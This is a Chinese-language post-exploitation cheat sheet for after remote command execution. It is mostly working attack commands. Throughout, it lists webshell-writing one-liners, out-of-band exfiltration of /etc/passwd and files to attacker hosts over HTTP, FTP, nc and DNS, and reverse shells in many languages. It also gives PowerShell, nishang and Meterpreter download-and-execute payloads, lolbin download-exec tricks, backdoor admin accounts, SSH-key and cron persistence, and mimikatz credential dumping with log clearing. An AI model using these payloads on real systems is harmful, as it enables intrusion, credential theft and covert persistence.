0x00 前言

命令执行后有关的一些归纳(持续补充)。

0x01 基础详情

针对命令执行后对系统做更深入的渗透,常规先判断系统类型,命令是否回显,以及目标系统是否能够出网,即系统类型->是否回显->能否出网。代码相对简单,所以很多都是直接贴代码,有错误之处欢迎指正。

1.可回显

webshell(apache tomcat nginx等可直接解析脚本的写入webshell)

window

dir /s/a-d/b d:\*123456.asp  #查找123456.asp 位置
echo ^<^%eval request^(chr^(35^)^)^%^> > "d:\JINHER\C6\JHSoft.Web.Login\images\LoginTemplate\whynot.asp" # <>等特殊符号在cmd下需要转码 而且写入文件不可带有<>:等特殊字符
copy c:\\Inetpub\\wwwroot\\ckfinder\\userfiles\\files\\images\\cknife.jpg c:\\Inetpub\\wwwroot\\ckfinder\\userfiles\\files\\images\\cknife.aspx # 命令不好使时尝试其他命令 

for /F %s in ('dir /s/a-d/b c:\*.aspx') do echo 123 >123.aspx
在有aspx文件的后面重新生成.aspx的后缀 内容为123 例如a.aspx 生成a.aspx.aspx   #缺点相对暴力 优点不回显有时候也可以用
for /F %s in ('dir /s/a-d/b f:\*login.css') do echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> >%s.aspx

linux

locate find等命令 查询文件位置
echo PD9waHAgcGhwaW5mbygpOz8+ | base64 -d > 360.php   #PD9waHAgcGhwaW5mbygpOz+是<?php phpinfo();?> base64编码 linux文件名不能带有/(斜杠)

OOB(out of band) (无法回显和能出网时使用)

window

基于OOB(out of band)的回显(能出网)
for /F %s in ('whoami') do start http://10,10.10.10:8080/?user=%s   #查询文件位置web历史记录 会打开目标浏览器
for /F %s in ('dir /b') do start http://10.10.10.10:81/?user=%s

curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}    #传输到ftp
wget –header="EVIL:$(cat /etc/passwd)" http://xxx.xxx.xxx:xxxx  #需要自搭建server服务器支持
#wget –header=”evil:`cat /etc/passwd | xargs echo –n`” http://xxx.xxx.xxx:xxxx 

wget –post-data exfil='cat /etc/passwd' http://dnsattacker.com           # extract data  in post section
wget –post-file trophy.php http://dnsattacker.com    # extract source code
cat /path/to/sensitive.txt | curl –F ":data=@-" http://dnsattacker.com/test.txt

Viticm
nc -w 1000 10.10.10.10 1234 < config.php
Attacker
nc -l 1234 > config.php

linux

基于OOB(out of band)的回显
#curl `whoami`.xxxx.xxx(子域名)     #可以用该方法把不回显变得回显
#curl http://10.10.10.10:81/?user=`id`
#wget http://10.10.10.10:81/?user=`id`
#ping %USERNAME%.b182oj.ceye.io
#ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.xxx.com DNS记录获取源IP(根据情况需要修改,不通用)

通用的一些

需要域名服务器支持
Victim  #参考https://www.exploit-db.com/docs/english/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf 
cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=GetContentoutput.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){$final=$j.tostring()+'.'+$i+'.fzrsuf.3w1.pw';$j += 1; nslookup $final }" 
Attacker
sudo tcpdump -n port 53 | tee file.txt
echo "0x$(cat file.txt |tr ' ' '\n' |awk '/file.oob.dnsattacker.com/ {print $1}'|sort -u| cut -d '.' -f 2|tr -d '\n')" | xxd -r -pr

Victim
wget --header=evil:$(ifconfig|xxd -p -c 100000) http://dnsattacker.com:9000
Attacker:
echo "0x$(ncat -lvp 9000 |grep -i evil|tr -d '/' |cut -d ' ' -f2)" |xxd -r -p

2.可出网

反弹shell或传马(使用tcpdump -i eth0 icmp 来监听或者搭建web服务器查看访问日志等来能否出网)。

window 使用ping 或者下面的download来判断是否能够出网,

powershell直接反弹(03默认无powershell winserver08默认是2.0)

powershell IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 8.8.8.8 -port 8888 #反弹shell
powershell -C "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8888"  #监听本地nc

http://8.8.8.8/2.php?id=1;exec master..xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http://youvps/Empire/data/module_source/code_execution/Invoke-Shellcode.ps1'');Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 8.8.8.8 -lport 4444 -force';--   #powershell调用msf反弹

IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/nishang/Scan/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254   #扫描端口

msf或者nc或者colbat strike传马等(msf为例)

生成恶意程序上传执行
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=8.8.8.8 lport=8888 -f dll -o test.dll
regsvr32 test.dll   #运行dll

attacker监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 8.8.8.8
set LPORT 8888
exploit

nc -vv 115.28.206.51 8080 -e c:\cmd.exe //链接到远程 不输入-e选项即时聊天
nc -lvvp 8080   //反弹
nc -nv 8.8.8.8 8080 -e C:\Windows\System32\cmd.exe
nc -lvp 8080

直接添加用户

net user xxx 123!@#qwe /add     #添加用户
net localgroup administrators xxx /add  #将xxx用户加入管理员
net user xxx /del   #删除用户

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  #开启3389 03 08测试通过
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000001 /f  #关闭3389
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #查看远程端口 十六进制

linux

  1. linux自带perl python ruby等语言,反弹shell较为容易 个人建议使用bash perl
判断能否出网
/usr/bin/curl
/usr/bin/wget
/bin/ping
如果担心引号转义麻烦或着其他 可以直接下载到服务器上执行
wget http://10.0.0.1/123344/back.pl -P /tmp/   去掉前缀脚本
perl /tmp/back.pl

curl `whoami`.xxxx.xxx(子域名)     #可以用该方法把不回显变得回显

bash反弹
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

上传bash文件
#!/bin/bash\n\n/bin/bash -i >& /dev/tcp/$1/$2 0>&1

PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat
nc -e /bin/sh 10.0.0.1 1234
部分版本nc -e不可用时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

node.js
require('child_process').exec('bash -i >& /dev/tcp/8.8.8.8/80 0>&1');
nc -lvvp 80

lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

2.非交互式添加linux用户

useradd -m test
echo "123456" | passwd --stdin test #非交互式设置密码
userdel -r test     #删除该用户

3.写入.ssh/authorized_keys 或者 crontab

echo 公钥 > .ssh/authorized_keys
/var/spool/cron/root    #centos 写入root用户任务计划
/etc/cron.d/shell   #debian 在/etc/cron.d/会被当作任务计划执行

3.密码抓取

通用 注意密码抓取需要root权限。

laz.exe all #通用可以抓取wifi密码,常见浏览器(如google facebook登陆密码),数据库,outlook邮箱以及操作系统等各种密码     #https://github.com/AlessandroZ/LaZagne

window

提权参考    #https://github.com/SecWiki/windows-kernel-exploits
powershell IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/123344/PowerShell/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://8.8.8.8/123344/ms15-051.exe -ExeArgs "cmd" -ForceASLR #远程执行exe
mimikatz    #抓取密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  #https://github.com/gentilkiwi/mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/nishang/Gather/Invoke-Mimikatz.ps1');Invoke-Mimikatz  #远程调用mimikaz  web中注意引号
mimikaz清除登陆等日志信息
privilege::debug
event::drop
event::clear

linux

./mimipenguin   #支持ubuntu和Fedora部分版本 https://github.com/huntergregal/mimipenguin
linux提权好用的一些工具
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/SecWiki/linux-kernel-exploits

4.下载执行(download and exec)

powershell
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

certutil    #03 08都可以
certutil -urlcache -split -f https://github.com/3gstudent/test/raw/master/putty.exe c:\download\a.exe&&c:\download\a.exe
certutil -urlcache -split -f http://8.8.8.802:80/a.txt b.txt
certutil -urlcache -split -f http://8.8.8.802:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://8.8.8.802:80/a delete  #远程执行js
certutil -urlcache -split -f http://8.8.8.8/123344/1.vbs a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://8.8.8.8/123344/1.vbs delete    #加载vbs执行
vbs 示例代码    #下载保存到c盘
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.206.101/file.zip",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "c:\file.zip",2

win03无 xp以后自带   #下载速度较慢
bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
bitsadmin /transfer n http://8.8.8.8/mimikaz.exe Z:/file/proof/tmp/1.exe
bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip C:\test\update\PSTools.zip
bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip

csscript 
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct    #远程执行文件弹出计算器

telnet  
服务端:nc -lvp 23 < nc.exe
下载端:telnet ip -f c:\nc.exe

regsvr32
regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec.sct scrobj.dll

rundll32  
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();


mshta
mshta https://3gstudent.github.io/test/downloadexec2.hta    #需要开启IE浏览器-Internet选项-安全选择可信站点,添加博客地址:https://3gstudent.github.io/

wmic and Regasm/Regsvc
wmic os get /format:"https://webserver/payload.xsl"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
linux方法通用,这里不讲述过多 详情可参考 https://gtfobins.github.io/
wget www.baidu.com/1.rar -P /tmp/ #保存到tmp目录下
curl $URL -o $LFILE
nc
lua

相关链接如下:

https://github.com/samratashok/nishang  #powershell框架
https://github.com/EmpireProject/Empire
https://github.com/PowerShellMafia/PowerSploit
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8Egithub%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95/
https://gtfobins.github.io/
http://reverse-tcp.xyz/pentest/red%20team/2017/12/28/windows-to-download-and-execute-arbitrary-code.html
https://www.exploit-db.com/docs/english/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf

源链接

Hacking more

...